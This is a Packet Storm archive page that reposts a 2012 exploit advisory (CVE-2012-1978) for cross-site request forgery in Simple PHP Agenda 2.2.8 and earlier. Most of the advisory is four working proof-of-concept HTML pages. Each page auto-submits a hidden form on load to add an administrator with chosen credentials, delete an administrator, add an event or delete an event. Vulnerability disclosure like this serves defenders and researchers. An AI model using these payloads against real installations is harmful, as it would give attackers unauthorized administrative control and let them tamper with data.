what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Simple PHP Agenda 2.2.8 Cross Site Request Forgery

Simple PHP Agenda 2.2.8 Cross Site Request Forgery
Posted Mar 30, 2012
Authored by Ivano Binetti

Simple PHP Agenda versions 2.2.8 and below suffer from multiple cross site request forgery vulnerabilities.

tags | exploit, php, vulnerability, csrf
advisories | CVE-2012-1978
SHA-256 | 02e95a628273a7d274960548d31bfc06e489e5e9030ae0a37dac889a18238b13

Simple PHP Agenda 2.2.8 Cross Site Request Forgery

Change Mirror Download
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Simple Php Agenda <= 2.2.8 CSRF (Add Admin/Add New Event)
# Date : 29-03-2012
# Author : Ivano Binetti (http://ivanobinetti.com)
# Software link : http://sourceforge.net/projects/php-agenda/files/latest/download
# Version : 2.2.8 and lower
# Tested on : Debian Squeeze (6.0)
# CVE : CVE-2012-1978
# Original Advisory: http://www.webapp-security.com/2012/03/simple-php-agenda/
+--------------------------------------------------------------------------------------------------------------------------------+
Summary
1)Introduction
2)Vulnerabilities Description
3)Exploit
3.1 Add Administrator
3.2 Delete Existing Administrator
3.3 Add a New Event
3.4 Delete an Existing Event
+--------------------------------------------------------------------------------------------------------------------------------+
1)Introduction
Simple Php Agenda is "a simple agenda tool written in PHP with MySQL backend. An agenda tool accessible everywere there's
internet".

2)Vulnerabilities Description
Simple Php Agenda 2.2.8 (and lower) is affected by a CSRF Vulnerability which allows an attacker to add a new administrator,
delete an existing administrator, create/delete a new event and change any other parameters. In this document I will only
demonstrate how to:
- add a new administrator
- delete a existing administrator
- add a new event
- delete an existing event.
Other parameters can be also modified.

3)Exploit
3.1 Add Administrator
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://<Simple_Php_Agenda_ip>:80/auth/process.php">
<input type="hidden" name="user" value="newadmin"/>
<input type="hidden" name="pass" value="password"/>
<input type="hidden" name="email" value="email@email.com"/>
<input type="hidden" name="subjoin" value="1"/>
</form>
</body>
</html>


3.2 Delete Existing Administrator
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://<Simple_Php_Agenda_ip>:80/auth/admin/adminprocess.php">
<input type="hidden" name="deluser" value="pippo2"/>
<input type="hidden" name="subdeluser" value="1"/>
</form>
</body>
</html>

3.3 Add a New Event
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://<Simple_Php_Agenda_ip>:80/engine/new_event.php">
<input type="hidden" name="date" value="2012-03-30"/>
<input type="hidden" name="time" value="16%3A30"/>
<input type="hidden" name="title" value="new_event_title"/>
<input type="hidden" name="description" value="event_description"/>
<input type="hidden" name="newEvent" value="Aggiungi+evento"/>
</form>
</body>
</html>

3.4 Delete an Existing Event
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://<Simple_Php_Agenda_ip>:80/phpagenda/?deleteEvent=2">
</form>
</body>
</html>
+--------------------------------------------------------------------------------------------------------------------------------+

Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    0 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close